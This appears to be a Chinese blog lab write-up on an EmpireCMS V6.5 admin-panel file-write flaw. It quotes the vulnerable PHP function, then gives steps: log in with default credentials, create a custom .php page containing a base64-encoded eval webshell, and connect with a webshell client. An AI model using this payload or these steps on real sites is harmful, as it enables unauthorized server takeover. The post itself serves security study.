EmpireCMS文件写入getshell

最新推荐文章于 2024-04-28 18:22:45 发布
最新推荐文章于 2024-04-28 18:22:45 发布
阅读量938 收藏 1
点赞数
分类专栏: Web安全攻防 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zlirving_/article/details/106979865
版权
漏洞描述

Empirecms V6.5后台自定义页面处通过任意文件写入可getshell

①任意文件写入漏洞的原理通过提交数据,可以将任意的文件写入到网站中。
②攻击者在获取到后台权限后,进行添加页面,添加成php页面,并且内容为一个PHP一句话木马,即可获得shell权限,威胁网站安全。
 

漏洞分析
//后台自定义斜页面写入文件的方法
WriteFiletext($path,$pagetext);
...
function WriteFiletext($filepath,$string)
{
	global $public_r;
	$string=stripSlashes($string);
	$fp=@fopen($filepath,"w");
	@fputs($fp,$string);
	@fclose($fp);
	if(empty($public_r[filechmod])){
		@chmod($filepath,0777);
	}
}

上面的代码中可以看出变量$pagetext经过函数WriteFiletext写入到了文件中,在写入的过程中没有进行严格的过滤就进行写入操作,导致可以任意文件写入,从而导致可以产生恶意的php页面,使得攻击者可以很简单的获取到shell权限。

漏洞利用

通过帝国cms默认后台路径找到后台登陆地址后台地址(http://ip/e/admin/,可爆破出用户admin,密码admin123)
登录后台页面如下图
在这里插入图片描述
点击模块管理,然后点击自定义页面,再点击增加自定义页面,最后在页面名称和文件名处输入内容(如:123.php)页面内容输入:<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script>,然后点击提交。如下图:
在这里插入图片描述
在hackbar加载http://ip/e/admin/123.php,在post_data数据区输入cmd=phpinfo();,点击execute触发漏洞,结果如图:
①查看phpinfo
在这里插入图片描述
②菜刀连上
在这里插入图片描述
 
GOT IT!
很简单的一次实验,主要是培养巩固思路

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
目前最新帝国EmpireCMS7.5后台模板.rar
12-18
3. **更新缓存数据**:完成文件覆盖后,登录EmpireCMS后台,进入管理界面,找到“更新缓存数据”功能。执行该操作可以刷新系统的配置缓存,使新模板生效。 4. **清除浏览器缓存**:为了确保浏览器不会因缓存旧的...
EmPireCMS帝国系统_V7.5.zip
11-10
EmPireCMS在安全性方面做了大量工作,如SQL注入防御、XSS跨站脚本攻击防护、上传文件安全检查等,保障了系统的稳定运行。 4. **性能优化** - **缓存机制**:支持静态化和动态缓存,减少数据库查询,提升网站访问...
EmpireCMS 6.0 管理权限GETSHELL
aqi1721的博客
09-04 168
Author -> hExi3 Security TeAm TestEd On : IIS6.0+2k3 分析过程 : \e\class\functions.php 2609行 ReUserjs 函数. function ReUserjs($jsr,$addpath){ global $empire,$public_r; DoFileMkDir($a...
帝国 loginjs.php,帝国cms 6.6 后台拿shell
weixin_28807463的博客
03-12 221
时间:2013-02-27来源:源码库 作者:源码库 文章热度:℃漏洞作者: 付弘雪提交时间: 2013-01-21公开时间: 2013-01-21漏洞类型: 文件上传导致任意代码执行简要描述:帝国cms 6.6版本后台拿shell 比网上流行的方法简单很多由于 提交模版未过滤问题 导致的详细说明:后台-模版-公共模版-js调用登陆模版此处功能为修改js调用登陆模板的样式当点击修改的时候系统会把e...
Web安全 EmpireCMS漏洞常见漏洞分析及复现
最新发布
2401_84297796的博客
04-28 740
点击下一步就会自动在数据库生成一个empirecms的数据库并在其中建立许多个表然后再设置进入后台管理员的密码下一步即可安装完成,这里提示要删除路径避免被再次安装,但是这个地方其实设置了两层保护,即使你访问install这个路径会有一个.off文件在路径下,需要将这个.off文件删除后才能再次安装输入设置的后台管理员用户名和密码即可进入管理员后台。
帝国php漏洞,EmpireCMS(帝国cms)csrf getshell
weixin_30564897的博客
03-18 514
漏洞作者: ../帝国cms默认添加栏目时候默认是允许投稿。另外帝国的会员中心基本都是开启的,有的就算不开启也是可以匿名投稿。漏洞证明:图1所示,帝国添加栏目时候默认是开启投稿的。图2所示,虽然过滤的,但是未过滤img中的污染数据。这个地方插入也就是http://127.0.0.1/1.js,1.js代码看这里 WooYun: 帝国CMS CSRF GetShell图3所示:管理员看到未审核内容时...
帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现
一醉一休的博客
09-13 3202
EmpireCMS(帝国网站管理系统)是一套内容管理系统(`CMS`),EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以`实现任意代码执行`,EmpireCMS7.5版本中的/e/class/moddofun.php文件的`LoadInMod函数`存在安全漏洞,攻击者可利用该漏洞上传任意文件,该漏洞编号为`CVE-2018-18086`
帝国CMS后台getshell
qq_45300786的博客
05-12 857
后台新增页面,写入webshell 在后台查看文件写入成功 访问成功 shell工具连接成功
EmpireCMS-6.0os-SC-GBK.zip
03-09
标题中的"EmpireCMS-6.0os-SC-GBK.zip"指的是该系统的第6.0版本,特别为简体中文环境(SC)设计,并使用GBK编码。GBK编码是中国大陆广泛使用的汉字编码标准,能够包含大部分中文字符,适用于中文网站的建设。 ...
EmpireCMS_7.5_SC_UTF8.zip
06-06
EmpireCMS中,内容发布时如果需要添加附件,这些文件会被上传到这个目录,然后通过系统内部链接引用。 6. **doc目录**: “doc”目录包含系统文档,可能是更详细的用户手册、开发者指南等,帮助用户更好地理解和...
EmpireCMS短信插件_帝国CMS系统短信设置
10-20
第一步:将短信插件解压至根目录覆盖,浏览器输入:域名/install_smshuyi.php安装短信插件,出现安装成功提示后请将根目录下的install_smshuyi.php删除 第二步:进入系统后台->插件->手机短信管理->短信账户设置
帝国6.5后台拿shell快速版
cnbird's blog
12-10 1253
帝国6.5后台拿shell快速版
帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析
WY92139010的博客
08-19 827
帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析 一、漏洞描述 该漏洞是由于安装程序时没有对用户的输入做严格过滤,导致用户输入的可控参数被写入配置文件,造成任意代码执行漏洞。 二、漏洞复现 1、漏洞出现位置如下图,phome_表前缀没有被严格过滤导致攻击者构造恶意的代码    2、定位漏洞出现的位置,发现在/e/install/index.php,下图可以看到表...
cms前台getshell分析
IT-Andy
12-18 1273
前言 毫无套路的在cnvd上看见了一个漏洞,毫无套路的想着分析一下 一脸懵逼的Getshell 官网地址:http://www.earcms.net/ 先到官网把源码下载下来搭建一下,结果发现源码是混淆过的 这种混淆方式很常见,解密也不难,因为已经知道是前台文件上传导致的getshell,所以暂时不需要全部解密出来一点点分析,暂时只关注他的上传点。 毫无套路的搭建完成后我们看到...
CNVD-2018-19126 EmpireCMS后台任意代码执行可GetShell
weixin_33725515的博客
10-26 440
[漏洞描述] EmpireCMS是一套免费的CMS(内容管理系统)。 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。 [影响版本] <=7.5 [漏洞危害] 高 [漏洞位置] /e/admin/admin/ebak/phome.php [系统]-[系统设置]-[备份与恢复数据]-[备份数据] [漏洞利用] 在[系统]...
121.网络安全渗透测试—[CMS后台 getwebshell]—[帝国empirecms6.6后台 getwebshell]
qwsn
07-10 2148
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 登录后台---->栏目---->自定义页面---->增加自定义页面---->填写页面名称为webshell.php(随便)---->文件名默认是…/…/page.html---->文件内容为以下内容:功能是创建shell.php文件写入一句话到shell.php文件中 栏目---->自定义页面---->管理自定义页面---->点击刚刚的page.html页面触发webshell(其实就是访问http://www.empirecm
php写入配置文件getshell,帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析
weixin_33256233的博客
03-17 281
帝国cms(empirecms) v7.5配置文件写入漏洞分析一、漏洞描述该漏洞是由于安装程序时没有对用户的输入做严格过滤,导致用户输入的可控参数被写入配置文件,造成任意代码执行漏洞。二、漏洞复现1、漏洞出现位置如下图,phome_表前缀没有被严格过滤导致攻击者构造恶意的代码2、定位漏洞出现的位置,发现在/e/install/index.php,下图可以看到表名前缀phome_,将获取表名前缀交给...
《帝国网站管理系统》实例入门教程.doc
06-16
这篇教程是针对《帝国网站管理系统》的新手用户,尤其是那些对EmpireCMS没有基础但希望通过它建立网站的用户。教程假设用户具备基本的Dreamweaver使用技能,能够设计简单的表格式模板。教程中提到的网站采用多种技术...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值